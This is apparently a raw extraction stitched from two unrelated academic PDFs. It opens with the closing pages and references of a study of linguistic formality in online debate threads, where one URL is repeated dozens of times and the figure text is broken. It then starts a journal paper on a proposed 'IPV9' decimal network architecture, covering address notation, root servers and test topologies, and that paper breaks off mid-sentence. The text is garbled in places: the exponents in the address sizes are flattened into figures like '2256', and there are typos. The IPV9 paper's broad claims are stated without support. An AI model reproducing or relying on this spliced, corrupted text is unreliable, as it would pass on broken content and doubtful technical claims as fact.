an increase of 1 in the prior post’s formality to correspond to an increase of 0.22 in the formality of the current post. This sug- gests that a person’s formality does depend on the formality of others in the conversation. Perhaps more interestingly, we see a signifi- cant positive effect of the interaction between previous score and position. That is, the effect of prior post formality on current post formality becomes stronger later in a thread compared to at the beginning of a thread. Figure 5 shows how the estimated coefficient for prior post formality on current post formality changes when we look only at posts at a particular index in a thread (e.g. only second posts, only tenth posts). We can see that the coefficient is more than twice as large for the tenth post of a thread than it is for the second post in that thread. One could imag- ine several explanations for this: i.e. users with similar formality levels may engage in longer dis- cussions, or users who engage in longer discus- 71 http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html 2 4 6 8 10 Position of post in thread 0.0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 E st im a te d c o e ff ic ie n t fo r p ri o r p o st 's f o rm a li ty Figure 5: Effect size of prior posts’s formality on current post’s formality for posts at different positions in a thread. Effect size can be inter- preted as the expected increase in a post’s for- mality corresponding to an increase of 1 in the prior post’s formality, all else being equal. sions may tend to adapt better to one another as the discussion progresses. We leave further investigation for future work. 6 Conclusion Language contains more than its literal content: stylistic variation accounts for a large part of the meaning that is communicated. Formality is one of the most basic dimensions of stylistic varia- tion in language, and the ability to recognize and respond to differences in formality is a necessary part of full language understanding. This paper has provided an analysis of formality in written communication. We presented a study of human perceptions of formality across multiple genres, and used our findings to build a statistical model which approximates human perceptions of for- mality with high accuracy. This model enabled us to investigate trends in formality in online de- bate forums, revealing new evidence in support of existing theories about formality and about linguistic coordination. These findings provide important steps toward building pragmatically competent automated systems. Acknowledgements. We would like to thank Martin Chodorow for valuable discussion and in- put, and Marilyn Walker, Shereen Oraby, and Shibamouli Lahiri for sharing and facilitating the use of their resources. We would also like to thank Amanda Stent, Dragomir Radev, Chris Callison-Burch, and the anonymous reviewers for their thoughtful suggestions. References Fadi Abu Sheikha and Diana Inkpen. 2010. Auto- matic classification of documents by formality. In Interntional Conference on Natural Language Pro- cessing and Knowledge Engineering (NLP-KE), pages 1–5. IEEE. Fadi Abu Sheikha and Diana Inkpen. 2011. Gen- eration of formal and informal sentences. In Pro- ceedings of the 13th European Workshop on Natu- ral Language Generation, pages 187–193, Nancy, France, September. Association for Computa- tional Linguistics. Cristina Battaglino and Timothy Bickmore. 2015. Increasing the engagement of conversational agents through co-constructed storytelling. Eighth Workshop on Intelligent Narrative Technologies. Julian Brooke and Graeme Hirst. 2014. Supervised ranking of co-occurrence profiles for acquisition of continuous lexical attributes. In Proceedings of The 25th International Conference on Computa- tional Linguistics. Julian Brooke, Tong Wang, and Graeme Hirst. 2010. Automatic acquisition of lexical formality. In Col- ing 2010: Posters, pages 90–98, Beijing, China, August. Coling 2010 Organizing Committee. Penelope Brown and Colin Fraser. 1979. Speech as a marker of situation. In Social Markers in Speech, pages 33–62. Cambridge University Press. Ido Dagan, Oren Glickman, and Bernardo Magnini. 2006. The PASCAL recognising textual entail- ment challenge. In Machine Learning Challenges. Evaluating Predictive Uncertainty, Visual Object Classification, and Recognising Textual Entail- ment, pages 177–190. Springer. Cristian Danescu-Niculescu-Mizil, Michael Gamon, and Susan Dumais. 2011. Mark my words!: Lin- guistic style accommodation in social media. In Proceedings of the 20th International Conference on World Wide Web, pages 745–754. ACM. Cristian Danescu-Niculescu-Mizil, Lillian Lee, Bo Pang, and Jon Kleinberg. 2012. Echoes of power: Language effects and power differences in social interaction. In Proceedings of the 21st International Conference on World Wide Web, pages 699–708. ACM. Cristian Danescu-Niculescu-Mizil, Moritz Sudhof, Dan Jurafsky, Jure Leskovec, and Christopher 72 Potts. 2013. A computational approach to polite- ness with application to social factors. Proceedings of the 51st Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Pa- pers), pages 250–259, August. Birgit Endrass, Matthias Rehm, and Elisabeth André. 2011. Planning small talk behavior with cultural influences for multiagent systems. Com- puter Speech & Language, 25(2):158–174. Alex Chengyu Fang and Jing Cao. 2009. Adjec- tive density as a text formality characteristic for automatic text classification: A study based on the british national corpus. In Proceedings of the 23rd Pacific Asia Conference on Language, Infor- mation and Computation, pages 130–139, Hong Kong, December. City University of Hong Kong. Rachele De Felice and Paul Deane. 2012. Identifying speech acts in e-mails: Toward automated scoring of the TOEIC R© e-mail task. ETS Research Report Series, 2012(2):i–62. Guy Fielding and Colin Fraser. 1978. Language and interpersonal relations. The social context of lan- guage, pages 217–232. Francis Heylighen and Jean-Marc Dewaele. 1999. Formality of language: Definition, measurement and behavioral determinants. Interner Bericht, Center “Leo Apostel”, Vrije Universiteit Brüssel. Eduard Hovy. 1987. Generating natural language under pragmatic constraints. Journal of Pragmat- ics, 11(6):689–719. Judith T. Irvine. 1979. Formality and informality in communicative events. American Anthropologist, 81(4):773–790. W. Lewis Johnson, Richard E. Mayer, Elisabeth André, and Matthias Rehm. 2005. Cross-cultural evaluation of politeness in tactics for pedagogical agents. In AIED, volume 5, pages 298–305. Raquel Justo, Thomas Corcoran, Stephanie M. Lukin, Marilyn Walker, and M. Inés Torres. 2014. Extracting relevant knowledge for the de- tection of sarcasm and nastiness in the social web. Knowledge-Based Systems, 69:124–133. Foaad Khosmood and Marilyn Walker. 2010. Grapevine: A gossip generation system. In Pro- ceedings of the Fifth International Conference on the Foundations of Digital Games, pages 92–99. ACM. J. Peter Kincaid, Robert P. Fishburne Jr., Richard L. Rogers, and Brad S. Chissom. 1975. Derivation of new readability formulas (automated readabil- ity index, fog count and Flesch reading ease for- mula) for navy enlisted personnel. Technical re- port, DTIC Document. Vinodh Krishnan and Jacob Eisenstein. 2015. You’re Mr. Lebowski, I’m the Dude: Inducing address term formality in signed social networks. Proceedings of the 2015 Conference of the North American Chapter of the Association for Compu- tational Linguistics: Human Language Technolo- gies, pages 1616–1626, May–June. Shibamouli Lahiri, Prasenjit Mitra, and Xiaofei Lu. 2011. Informality judgment at sentence level and experiments with formality score. In Computa- tional Linguistics and Intelligent Text Processing, pages 446–457. Springer. Shibamouli Lahiri. 2015. SQUINKY! A corpus of sentence-level formality, informativeness, and im- plicature. arXiv preprint arXiv:1506.02306. Haiying Li, Zhiqiang Cai, and Arthur C. Graesser. 2013. Comparing two measures for formality. In The Twenty-Sixth International FLAIRS Confer- ence. François Mairesse and Marilyn A. Walker. 2011. Controlling user perceptions of linguistic style: Trainable generation of personality traits. Com- putational Linguistics, 37(3):455–488. François Mairesse. 2008. Learning to adapt in dia- logue systems: Data-driven models for personality recognition and generation. Ph.D. thesis, Univer- sity of Sheffield, United Kingdom. Alejandro Mosquera and Paloma Moreda. 2012a. A qualitative analysis of informality levels in web 2.0 texts: The facebook case study. In Proceedings of the LREC workshop:@ NLP can u tag #user generated content, pages 23–29. Alejandro Mosquera and Paloma Moreda. 2012b. Smile: An informality classification tool for help- ing to assess quality and credibility in web 2.0 texts. In Proceedings of the ICWSM workshop: Real-Time Analysis and Mining of Social Streams (RAMSS). Kate G. Niederhoffer and James W. Pennebaker. 2002. Linguistic style matching in social interac- tion. Journal of Language and Social Psychology, 21(4):337–360. Ellie Pavlick and Ani Nenkova. 2015. Inducing lex- ical style properties for paraphrase and genre dif- ferentiation. In Proceedings of the 2015 Confer- ence of the North American Chapter of the Associ- ation for Computational Linguistics: Human Lan- guage Technologies, pages 218–224, Denver, Col- orado, May–June. Association for Computational Linguistics. Kelly Peterson, Matt Hohensee, and Fei Xia. 2011. Email formality in the workplace: A case study on the Enron corpus. In Proceedings of the Work- shop on Language in Social Media (LSM 2011), 73 pages 86–95, Portland, Oregon, June. Association for Computational Linguistics. Nils Reiter and Anette Frank. 2010. Identifying generic noun phrases. In Proceedings of the 48th Annual Meeting of the Association for Computa- tional Linguistics, pages 40–49, Uppsala, Sweden, July. Association for Computational Linguistics. Priya Sidhaye and Jackie Chi Kit Cheung. 2015. In- dicative tweet generation: An extractive summa- rization problem? Proceedings of the Conference on Empirical Methods in Natural Language Pro- cessing. Robert J. Sigley. 1997. Text categories and where you can stick them: A crude formality in- dex. International Journal of Corpus Linguistics, 2(2):199–237. Sangweon Suh, Harry Halpin, and Ewan Klein. 2006. Extracting common sense knowledge from wikipedia. In Proceedings of the Workshop on Web Content Mining with Human Language Tech- nologies at ISWC, volume 6. Marilyn A. Walker, Jean E. Fox Tree, Pranav Anand, Rob Abbott, and Joseph King. 2012. A corpus for research on deliberation and debate. The Inter- national Conference on Language Resources and Evaluation, pages 812–817. 74 work_hfzgvsxijbervexbqhpcikatiq ---- DOI: 10.21307/ijanmc-2019-054 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 1 Research on the System Structure of IPV9 Based on TCP/IP/M Wang Jianguo 1. State and Provincial Joint Engineering Lab. of Advanced Network, Monitoring and Control Xi'an, China 2. School of Computer Science and Engineering Xi'an Technological University Xi'an, China e-mail: wjg_xit@126.com Wang Zhongsheng 1. School of Computer Science and Engineering Xi'an Technological University Xi'an, China 2. State and Provincial Joint Engineering Lab. of Advanced Network, Monitoring and Control Xi'an, China e-mail: wzhsh1681@163.com Xie Jianping 1. Chinese Decimal Network Working Group Shanghai, China 2. Shanghai Decimal System Network Information Technology Ltd. e-mail: 13386036170@189.cn Zhong Wei 1. Chinese Decimal Network Working Group Shanghai, China 2. Shanghai Decimal System Network Information Technology Ltd. e-mail: 13331860961@189.cn Abstract—Network system structure is the basis of network communication. The design of network model can change the network structure from the root, solve the deficiency of the original network system, and meet the new demand of the future network. TCP/IP as the core network technology is successful, it has shortcomings but is a reasonable existence, will continue to play a role. Considering the compatibility with the original network, the new network model needs to be compatible with the existing TCP/IP four-layer model, at the same time; it can provide a better technical system to implement the future network. Based on the Internet three-layer/four-layer hybrid architecture TCP/IP/M and ISO/IEC next-generation Internet standard solutions, this paper proposes the IPV9 system architecture, which can directly transmit audio and video data with three layers on the premise of not affecting the existing four-layer network transmission. The hybrid structure is a new transmission theory, which requires the establishment of a link before data transmission and the withdrawal of the link after the transmission is completed. It solves the problem of high-quality real-time media communication caused by the integration of three networks (communication network, broadcasting network and Internet) from the underlying structure of the network, realizes the long-distance and large-traffic data transmission of the future network, and lays a solid foundation for the digital currency and virtual currency of the Internet. The system framework is verified by practical application. It have been deployed to verify the compatibility and reliable transmission between IPV9 network and the existing network, under the independent, reliable, secure and controllable network architecture, a new generation of master root server and 13 root domain name servers. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 2 Keywords-TCP/IP/M; Next Generation Internet; IPV9; Big Data Stream I. NEW GENERATION NETWORK SYSTEM IPV9 IPv9 protocol as one of the future network concepts, IETF proposed some basic dreams of IPv9 in 1994, and looked forward to the idea of network in the 21st century. Such as: 1024-bit length address, direct routing and the 42 layer routing addressing method. However, due to the lack of research results of basic theories, address stratification technology, high research and development costs, intellectual property rights and other factors, the research publicly failed. In 1997, the IPv9 working group was disbanded and intellectual property and patent results were not obtained. Inspired by IPv9, Chinese scholars have established a new generation of network work expert teams. Based on the patent "Method of Using Whole Digital Code to Assign Addresses for Computer", they have completed the development of a new generation of network system after more than 20 years of research and development. The development of the system, its theory and practice has reflected the novelty and originality. The decimal network has experienced the stages of assumption, theory, model, prototype, small-scale trial and demonstration project implementation. Since September 2001, the Ministry of Information Industry of China has decided to establish "Decimal Network Standard Working Group (also known as IPV9 Working Group)", "New-generation Security and Controllable Network Expert Working Group", and "Electronic Label Working Group Data", united domestic and foreign enterprises, research institutions and universities to develop the IPV9 protocol with independent intellectual property of the digital domain name and other technical standards. By June 2016, the Ministry of Industry and Information Technology announced the approval of the four standards of the IPV9 system. Through unremitting efforts in various aspects, the IPV9 system mother root server, the main root server, and 13 root name servers named after N-Z letter have been developed. II. THE DESIGN OF IPV9 ARCHITECTURE The conventional packet switching of TCP/IP protocol does not support real time application and circuit switching application, that is, the transmission of sound or image by circuit in the four-layer protocol. TCP/IP is a connectionless unreliable packet protocol with a maximum packet size of 1514 bytes. The main idea of IPV9 design is to combine the IP protocol of TCP/IP with circuit switching, and make use of routers compatible with both protocols and a series of protocols, so that the addresses of IPv4, IPv6 and IPV9 can be used simultaneously on the Internet. A. The hierarchy of IPV9 IPV9 system adopts the mixed network architecture of three-layer circuit/four-layer grouping, adopts the rules of verify first and then communication, address encryption, the address length could alter from 16-bie to 2048-bit, resource reservation, and adopts character direct route transmission mode, which apply virtual and real circuit to ensure the transmission security. The architecture diagram is shown in Figure 1. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 3 FN T hree/four Layer Model Network Application Layer TCP UDP IP M ARP ARP ENET ENET Ethernet cable 1 Ethernet cable 2 TCP/IP/M Application Layer Transport Layer Internetw- orking Layer Virtual Real Circuit Network Interface Layer 1 2 3 4 Figure 1. The Architecture Diagram B. IPV9 connection method TCP/IP/M protocol has developed absolute code stream and long stream code classes, a long packet can reach more than tens of megabytes. It can transmit telephone and cable TV data directly in three layers without affecting existing four-layer networks. A four/three-layer transport protocol with a new transmit theory that is not removed connect link until finished the transmission. The connection mode is shown in Figure 2. Internet Internet Internet Internet Composite time division virtual circuit，User exclusive bandwidth (Network cable, optical fiber) Three layers Three layers Virtual circuit connection Voice communication, file transfer, video conferencing four layers four layers four layers User Alpha User Beta Figure 2. The connection mode International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 4 IPV9 automatic allocation access system, the system uses OpenVpn to set up virtual private network, uses IP TUNNEL for 9over4 data transmission, TR069 as the control protocol to push data to the terminal, to achieve the IPv4 subnet to subnet or IPV9 transmission. It can be a transmission between different individual routes or between the same enterprise routes, or between enterprise or individual routes to backbone routes. OpenVpn was adopted to penetrate the subnet to form the proprietary virtual network, and on the basis of the virtual network, IP TUNNEL was implemented to complete the data transmission of 9over4.In the virtual private network, the TR069 protocol is used to push the automatically assigned personal address or manually assigned business address, and at the same time, the 4to9 of the individual or business is automatically pushed to the device router.IPV9 network management system is a set of comprehensive network management system based on web interface that provides network monitoring and other functions. It can monitor various network parameters and server parameters to ensure the safe operation of server system. Both IPV4 and IPV9 protocols are supported and flexible notification mechanisms are provided for system administrators to quickly locate and resolve problems. IPV9 network and IPV9 /IPv4 hybrid network is constructed by using IPV9 design router, client, protocol conversion router and other devices. It includes IPV9 future network root domain name system, promoting technology integration, business integration and data integration, and realizing cross-level, cross-region, cross-system, cross-department and cross-business collaborative management and services. We will build an integrated national big data center and gateway bureau through data centralization and sharing, and build a secure and controllable information technology system. C. Root domain name server IPV9 root DNS server is mainly used to manage the Internet and decimal network home directory. IPV9 root name server system consists of a parent root server, primary root server, 13 root name servers named by N-Z, Top-level domain server named by·CHN,·USA,·HKG,·MAC and other three characters 239 countries and regions, routing management system, application server and 10 Gigabit backbone routers. The China Decimal Network Standards Working Group is responsible for management of the decimal network root name server, domain name system, and IP address. The principle of root domain name server is that 13 root domain servers first read the primary root server, and then read the parent root server to obtain the data, and then spread to the whole network. The 13 root DNS servers are all equal. The system includes the parent root server and the primary root server. This hidden publishing host is accessed by only 13 root domain-name servers, which are read by mirror servers. The IPV9 root name server system is shown in Figure 3. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 5 IPV4/9 Router N Root domain name server O Root domain name server P Root domain name server Q Root domain name server R Root domain name server S Root domain name server T Root domain name server U Root domain name server V Root domain name server W Root domain name server X Root domain name server Y Root domain name server Z Root domain name server IPV4/9 Router IPV4/9 Router IPV4/9 Router IPV4/9 Router IPV4/9 Router IPV4/9 Router IPV4/9 Router IPV4/9 Router IPV4/9 Router IPV4/9 Router IPV4/9 Router IPV4/9 Router IPV4/9 Router IPV4/9 Router IPV4/9 Router IPV4/9 Router IPV4/9 Router TLD TLD TLD TLD IPv4/V9 network management server Primary root server Virtual cloud root server CHN National domain name server USA National domain name server HKG National domain name server Basket management system IPV4/9 Router Client presentation system IPV4/9 Router IPV4/9 Router IPV4/9 Router Figure 3. The IPV9 root name server system The root name server is the highest level domain name server in DNS (Domain Name System) and is responsible for providing the authorized domain name server address for resolving the TLD (Top Level Domain). At present, the root DNS server and the gTLD (general top-level domain) and the ccTLD (country/region top-level domain) are managed and controlled by ICANN (Internet Corporation for Assigned Names and Numbers). The domain name system is the basic service of the Internet, and the root server is the foundation of the whole domain name system. The IPV9-based root domain name resolution system can adapt to the IPv4 network, IPv6 network, IPV9 network. IPv9 resolution system can resolve the Internet user's domain name through the domain name server to obtain the corresponding access object IP address, and can send the request of non-digital domain name to the corresponding English domain name server or Chinese domain name server and domain name server in various languages, compatible with the current various domain name services. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 6 III. THE TEXT REPRESENTATION OF IPV9 ADDRESS The text representation of IPV9 address include "square brackets decimal" notation, "curly brackets decimal" notation, and " round brackets decimal" notation. A. Square brackets decimal The bracket decimal can be expressed in the following two ways: 1) 2048 bits are represented by "[]". The 2048 bits in the "[]" symbol are expressed in decimal notation and can be written in indefinite length. 2) IPV9 address representation with a length of 256 bits is in the form of " y[y[y[y[y[y[y[y", where each y represents a 32-bit part of the address and is expressed in decimal. 232 =4294967296, so y is a decimal number of ten digits. For example: 0003625410[0000030201]0000000000[0000000000]0 000000000[00008701]0000000562. In address representation, multiple consecutive zeros to the left of each decimal number can be omitted, but a decimal number that is completely zero needs to be represented by a zero. The contiguous all-0 field in the address is replaced by a pair of square brackets "[X]" (X is the number of segments in the all-0 field).The above address may be written as 3625410[30201[4] [508701[562. B. Curly brackets decimal This method divides the 256-bit address into four 64-bit decimal numbers represented by curly braces separating them. The representation method is in the form of "Z}Z}Z}Z", where each Z represents a 64-bit portion and is represented in decimal notation. It usage is exactly the same as Y, and it is compatible with Y. This greatly facilitates the current compatibility of these IPv4 addresses in IPV9. C. Round brackets decimal Since the address length of IPV9 defaults to 256 bits, there will still be many bits in each segment regardless of whether 4 or 8 segments are used. For example, each segment still has 32 bits with an 8-segment representation. In this way, the following situation will appear in the paragraph: ...] 0000000000000000000000000101101 0]...Such a situation is not only cumbersome to input, but also easy to make mistakes. For convenience, the parenthesis notation -- (K/L) is introduced, where "K" means 0 or 1 and "L" means the number of 0 or 1. The above example can be abbreviated as :...]( 0/25) of 1011010].... D. A text representation of the address prefix The IPV9 address scheme is similar to the supernetting and CIDR (Classless Inter-Domain Routing) schemes of IPv4, which all use the address prefix to represent the network hierarchy. The IPV9 address prefix is represented by a CIDR like representation in the form IPV9 address/address prefix length. IPV9 addresses are written in IPV9 address notation, and the length of the address prefix is the length of the contiguous bits that form the address prefix from the leftmost part of the address. For example, the address prefix 1502[0] [0[0]390820[4027] for 210 bits can be expressed as: 1502[0] [0] [0]390820[4027] [0] [0] [0]390820[0] [0] [0]/210, short for: 1502[3]390820[4027]/210. The ping implementation of the decimal network IPV9 address is shown in Figure 4. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 7 Figure 4. The ping implementation of the decimal network IPV9 address IV. IMPLEMENTATION OF IPV9 SYSTEM The IPV9 protocol implements the assumption that the address length is extended by the current 32-bit 1024-bit address and direct routing, and the original router class address addressing method is extended to the 42-layer route addressing method. According to the deficiency of the real network and the actual demand of future network, the new address, domain name system and routing addressing theory are studied to solve the problem of network resources and engineering implementation technology. In order to be compatible with the existing Internet, dual stack technology is adopted. Dual stack technology refers to enabling both IPv4 stack and IPV9 stack on a single device. In this way, the device can communicate with both the IPv4 and IPV9 networks. If the device is a router, the interfaces of router are configured with IPv4 addresses and IPV9 addresses, and can connect to the IPv4 and IPV9 networks. If the device is a computer, it would have both an IPv4 address and an IPV9 address, and the ability to handle both. The IPV9 dual protocol stack is shown in Figure 5. Figure 5. The IPV9 dual protocol stack A. Hardware component IPV9 system hardware devices are composed as follows: International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 8 1) Core router Core routers, also known as "backbone routers", are routers located in the center of the network. Routers located on the edge of the network are called access routers. Core routers and edge routers are relative concepts. They all belong to the router, but they come in different sizes and capacities. The core router of one layer is the edge router of the other layer. It is used for IPv9 core network environment to realize large capacity data exchange. 2) Edge router Edge routers, also known as "access routers", are routers located on the periphery of a network. Edge routers and core routers both belong to routers, but they have different sizes and capacities. The core router of one layer is the edge router of another layer. 3) IPV9-IPv4 protocol conversion router IPV9-IPv4 protocol conversion router is used for mutual conversion between IPV9 and IPv4 protocols. IPv4 protocol data is converted to IPV9 protocol data by using preset mapping rules through 4to9 network interface devices.IPV9 protocol data is converted to IPv4 protocol data using preset mapping rules through the 9to4 network interface device. 4) Embedded router Embedded router is low-cost user side access router. It can be easily deployed in the case of access to IPV9 network and the Internet. 5) Client System support Centos5.5 32bit, Centos7 64bit client, and support mainstream Linux release later. IPv9 virtual machine that supports VMware allows customers to quickly deploy with existing hardware devices. Windows7, 9, 10 based on Windows IPv9 protocol stack client. 6) Beidou /GPS timing server System Support Beidou, GPS satellite signal, and provide IPv4, IPV9 protocol NTP Server. User devices can be timed over IPv4 or IPV9 protocols. B. Software system 1) IPv9 network management system IPV9 network management system is a set of comprehensive network management system based on web interface that provides network monitoring and other functions. It can monitor various network parameters and server parameters to ensure the secure operation of server system. Both IPv4 and IPV9 protocols are supported and flexible notification mechanisms are provided for system administrators to quickly locate and resolve problems. 2) IPv9 automatic allocation access system The system set up a virtual private network with OpenVpn, IP TUNNEL for 9over4 data transmission, and TR069 as the control protocol to push data to the terminal, and finally the IPv4 subnet to subnet or IPv9 transmission was realized. IPv4 subnet to subnet or IPv9 transmission can be implemented in different personal routing, the same enterprise routing, or between enterprise and personal routers to backbone routes. OpenVpn is adopted to penetrate the subnet to form the proprietary virtual network; IP TUNNEL is implemented to complete the data transmission of 9over4 on the basis of the virtual network. In the virtual private network, the TR069 protocol is used to push the automatically assigned personal address and manually assigned enterprise address, and at the same time, the 4to9 of the individual or enterprise is automatically pushed to the device router. 3) IPv9 Windows protocol stack Based on the original IPv4 and IPv6 protocols of the Windows operating system, the IPV9 protocol is added to realize the dual stack working access. V. APPLICATION OF IPV9 SYSTEM We designed the following scenarios to more fully reflect the features and advantages of the IPV9 network system. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 9 A. Application 1—Pure IPV9 Network Architecture This application implements a pure IPV9 network architecture. The simplest system includes IPV9 client/server A, IPV9 client/server B, 10G IPV9 routers C, D. The network topology is shown in Figure 6. IPV9 IPV9 IPV9 IPV9 client A IPV9 client BIPV9 router C IPV9 router D Figure 6. Pure IPV9 client-server test topology The pure IPV9 network architecture is suitable for building a pure IPV9 network in one area and establishing an independent IPV9 network system. B. Application 2—IPv4 network applications are connected via pure IPV9 network. This application implements IPv4 network application to communicate through pure IPV9 network. The simplest system includes IPv4 client/server A, IPv4 client/server B, IPV9 10G routers C and D. The network topology is shown in figure 7. IPv4 IPV9 IPv4 IPv4 client A IPv4 client BIPV9 router C IPV9 router D Figure 7. IPv4 network application test topology through pure IPV9 network connection This scenario is suitable for several IPv4 networks in different regions connected through the IPV9 core network to achieve penetration access between different IPv4 networks. A main feature is that other areas are using the IPV9 protocol transmission in addition to the existing IPv4 network, which requires the different IPv4 network between the need for a private network connection (such as optical fiber, DDN line, etc.). C. Application 3—IPv4 network is connected through 9over4 tunnel This application implements IPv4 network application communication through 9over4 tunnel. The simplest system includes IPv4 client/server A, IPv4 client/server B, IPV9 10G router C, D. The biggest difference between scenario 3 and scenario 2 is that the IPv4 public network address between routers C and D is based on 9over4 tunnel communication. This scenario simulates that IPV9 uses the existing IPv4 public network to achieve IPV9 network connectivity in different geographic regions, and has the ability to build a national network. The network topology is shown in Figure 8. IPv4 IPv4 IPv4 IPv4 client A IPv4 client BIPV9 router C IPV9 router D Figure 8. IPv4 network test topology through 9over4 tunnel connection International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 10 IPv4 networks in different areas are connected through the IPV9 over IPv4 core network to achieve transparent access between different IPv9 networks. A major feature is that system uses existing IPv4 networks between core networks, communicates via 9over4 tunnel mode. It uses the existing IPv4 public network to quickly establish connections between different regional IPv4 networks and achieve penetration access. D. Application 4—IPV9 network connected through 9over4 tunnel This application implements IPV9 network application communication through 9over4 tunnel. The simplest system includes IPV9 client/server A, IPV9 client/server B, IPV9 10G router C, D. The network topology is shown in Figure 9. IPV9 IPv4 IPV9 IPV9 client A IPV9 client BIPV9 router C IPV9 router D Figure 9. IPv9 network test topology through 9over4 tunnel connection The application implements the IPV9 network to connect through the IPV9 over IPv4 core network to achieve transparent access between different IPV9 networks. A major feature is the use of existing IPv4 networks between core networks, communicating via 9over4 tunnel mode. E. Application 5—Hybrid Network Architecture In this application, the client side of the IPV9 access router accesses the IPv4 network and the IPV9 network. The network side of multiple IPV9 access routers accesses the user side of the same core router, and the network side of the core router accesses the IPV9 network and IPv4 network (including public network). The application can achieve the following functions: (1) IPv4 client penetrates private network to access the IPv4 client of other subnets; (2) IPv4 client accesses the Internet normally; (3) IPV9 client accesses the IPV9 client of other autonomous domains; (4) OSPFv9 dynamic router protocol is used between access routers to establish network; (5) IPV9 core routers can choose to use 9over4 network to access Shanghai node IPV9 network, or use pure IPV9 protocol to access Beijing node IPV9 network. The network topology is shown in Figure 10. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 11 IPV9 client 1 IPV9 client 2 IPV9 client 3 IPV9 client 4 IPV9 client 5 IPV9 client 6 Access router TY-GD10G0009 Access router TY-GD10G0010 Access router TY-GD10G0011 Backbone router TY-GD100G003 IPV9 IPV9 IPV9 IPV9 client 7 IPV9 client 8 IPV9 client 9 IPV9 client 10 Access router TY-GD10G0014 Access router TY-GD10G0015 Backbone router TY-GD100G004 IPV9 IPV9 IPV9/IPv4 IPV9/IPv4 Switch TY-GDSW001 IPV9 Access router C1 Backbone router C IPV9 IPV9 client 11 IPV9 client 12 IPv4 Internet 9over4 9over4 Shanghai Backbone Node IPV9 Access router D1 Backbone router D IPV9 IPV9 client 13 IPV9 client 14 Beijing Backbone Node Backbone router TY-GD10G0016 IPV9 Figure 10. IPV9 hybrid network architecture test topology This application scenario is mainly used to build an IPV9 network environment and seamlessly integrate IPv4 networks and IPV9 networks. All IPv4 and IPV9 network islands are connected using the IPV9 protocol or the existing IPv4 public network. It is convenient and fast to connect independent networks in different regions to form a national unified network by using the IPV9 network system. F. Application 6--IPV9 Root Domain Name Agent System IPV9 root domain name system provides the system expansion support capability compatible with the RFC1035 protocol under the support of a powerful database, and forms a symbiotic relationship with the existing IPv4 domain name system. At the same time, it provides an independent and controllable application guarantee for the IPV9 domain name. The system network includes three parts: IPV9 domain name back-end support system, routing and network add service system, and application system. IPV9 domain name back-end support system can be deployed in a grid, deployed in Shanghai and Beijing to establish a root domain extension support environment that is both organic and relatively independent. The routing and network service system can choose IPv4, IPv6 networks or IPV9 network. The application system includes mobile terminal and International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 12 desktop platform support system. The network topology is shown in Figure 11. Figure 11. IPV9 root domain name proxy system topology Figure 12. IPV9 root domain name proxy system analysis results VI. SUMMARY The main technical features and innovations of IPV9 system are as follows. 1) Independent address text format Decimal network technology can be independent of the original IPv4 and IPv6 network networking. The IPV9 address text representation of decimal network uses the Arabic numerals of 0-9 and "[" as a separator, which is compatible with IPv4 and IPv6. 2) Infinite IP address space The length of IPV9 address is 2256, can be up to 21024. It conforms to assumptions of ISO future networks 66N13376, 66N13488, 6N13947 and RFC1606, RFC1607. The address resources are very rich. End-to-end transmission can be achieved according to the requirements, which have high efficiency and economy. The IPV9 address uses a technique of two-sided compression and a number of brackets in the compression section, which is simple and convenient to use. 3) Safe and controllable IPV9 USES a specific encryption mechanism for the address to achieve point-to-point transmission to enhance the privacy of users. In order to ensure the healthy and orderly development of information services, the means of verification before communication can be temporarily closed to businesses with incomplete or unqualified security measures. IPV9 is independent of IPv4 and IPv6 Internet networking. It can effectively manage and control network security and information security. According to the actual needs, users 